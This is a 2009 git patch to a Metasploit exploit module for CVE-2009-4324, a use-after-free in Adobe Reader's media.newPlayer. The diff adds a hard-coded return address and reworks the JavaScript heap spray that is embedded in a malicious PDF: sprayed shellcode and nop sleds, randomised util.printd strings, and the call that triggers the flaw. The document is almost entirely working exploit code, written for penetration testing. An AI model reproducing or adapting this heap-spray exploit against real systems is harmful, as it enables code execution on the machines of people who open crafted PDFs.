From 0fa275b53b86b31b3a43435e3dbcb883d4033cd7 Mon Sep 17 00:00:00 2001
From: pusscat <>
Date: Wed, 16 Dec 2009 21:44:18 +0000
Subject: [PATCH] Cleanups

Allow arbitrary (non-unicode) targets




git-svn-id: file:///home/svn/framework3/trunk@7895 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../fileformat/adobe_media_newplayer.rb       | 25 ++++++++++++-------
 1 file changed, 16 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
index 9a23c4f88e..82b9abbbfb 100644
--- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb
@@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					[ 'CVE', '2009-4324' ],
-					[ 'BID', '37331' ],
 					[ 'OSVDB', '60980' ]
 				],
 			'DefaultOptions' =>
@@ -50,14 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					# test results (on Windows XP SP3)
-					# reader 6.0.1 - vulnerable / doesn't work
 					# reader 7.0.5 - untested
 					# reader 7.0.8 - untested
-					# reader 7.0.9 - vulnerable / doesn't work
+					# reader 7.0.9 - untested
 					# reader 7.1.0 - untested
 					# reader 7.1.1 - untested
 					# reader 8.0.0 - untested
-					# reader 8.1.1 - works
 					# reader 8.1.2 - untested
 					# reader 8.1.3 - untested
 					# reader 8.1.4 - untested
@@ -66,9 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
 					# reader 9.0.0 - untested
 					# reader 9.1.0 - works
 					# reader 9.2 - works (no debugger, no DEP)
-					[ 'Adobe Reader Windows Universal (JS Heap Spray)',
+					[ 'Adobe Reader Windows English (JS Heap Spray)',
 						{
-							'Size'		=> (0x10000/2)
+							'Size'		=> (0x10000/2),
+                            'Ret'       => 0x002e0031
 						} 
 					],
 				],
@@ -91,12 +89,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		nops    = Rex::Text.to_unescape(make_nops(4))
 
 		# Randomize variables
+        #
+        len    = 72 
 		rand1  = rand_text_alpha(rand(100) + 1)
 		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+        rand4  = rand_text_alpha(len/2)
+        rand5  = rand_text_alpha(len/2)
+        
+        retstring  = Rex::Text.to_unescape([target.ret].pack('V') + rand_text_alpha(len-4))
 		
+        # The printd strings are 72 bytes (??)
 		script = %Q|
 var #{rand1} = unescape("#{shellcode}");
 var #{rand2} = unescape("#{nops}");
+var #{rand3} = unescape("#{retstring}");
 
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
@@ -107,10 +114,10 @@ for(i=0;i<0x2000;i++) {
 	memory[i]= #{rand2} + #{rand1};
 }
 
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand4}", new Date());
+util.printd("#{rand5}", new Date());
 try {this.media.newPlayer(null);} catch(e) {}
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd(#{rand3}, new Date());
 |
 		
 		# Create the pdf